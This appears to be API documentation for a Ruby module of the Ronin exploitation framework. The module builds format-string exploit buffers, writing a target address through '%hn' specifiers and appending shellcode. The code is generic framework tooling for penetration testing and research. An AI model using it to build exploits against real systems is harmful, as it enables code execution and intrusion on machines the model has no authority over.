Module: Ronin::Exploits::Helpers::FormatString

Defined in:
lib/ronin/exploits/helpers/format_string.rb

Overview

Adds methods to exploits for generating format strings to be used in format string vulnerabilities.

Target Parameters

The format string helper uses the following target parameters:

  • overwrite
  • pop_length
  • address

Payloads

Uses the Payloads::Shellcode payload by default.

Instance Attribute Summary collapse

Class Method Summary collapse

Instance Method Summary collapse

Instance Attribute Details

#format_stringObject

The format string of the exploit.


46
47
48
# File 'lib/ronin/exploits/helpers/format_string.rb', line 46

def format_string
  @format_string
end

Class Method Details

.extended(obj) ⇒ Object


48
49
50
# File 'lib/ronin/exploits/helpers/format_string.rb', line 48

def self.extended(obj)
  obj.instance_eval { helper :binary }
end

Instance Method Details

#build_format_stringString (protected)

Builds a format string using the current target and payload to be used in the format string exploit.


105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
# File 'lib/ronin/exploits/helpers/format_string.rb', line 105

def build_format_string
  test_target!

  buffer = pack(target.overwrite) + 
           pack(target.overwrite + (target.arch.address_length / 2))

  low_mask = 0xff
  (target.arch.address_length/2).times do
    low_mask <<= 8
    low_mask |= 0xff
  end

  high_mask = low_mask << (target.arch.address_length*4)
  high = (target.address & high_mask) >> (target.arch.address_length/2)
  low = target.address & low_mask

  if low < high
    low -= (target.arch.address_length*2)
    buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,target.pop_length,high-low,target.pop_length+1)
  else
    high -= (target.arch.address_length*2)
    buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,target.pop_length+1,low-high,target.pop_length)
  end

  buffer << raw_payload
  return buffer
end

#payload_classClass

Specifies that the exploit should use the Payloads::Shellcode class when searching for compatible payloads.

Since:

  • 0.3.0


61
62
63
# File 'lib/ronin/exploits/helpers/format_string.rb', line 61

def payload_class
  Payload::Shellcode
end

#test_target!true

Tests the selected target and if it contains the overwrite, pop_length and address target parameters.

Raises:

  • (TargetDataMissing)

    The target is missing either the overwrite, pop_length or address target parameters.

Since:

  • 1.0.0


78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
# File 'lib/ronin/exploits/helpers/format_string.rb', line 78

def test_target!
  super

  unless target[:overwrite]
    raise(TargetDataMissing,"target missing the 'overwrite' param")
  end

  unless target[:pop_length]
    raise(TargetDataMissing,"target missing the 'pop_length' param")
  end

  unless target[:address]
    raise(TargetDataMissing,"target missing the 'address' param")
  end

  return true
end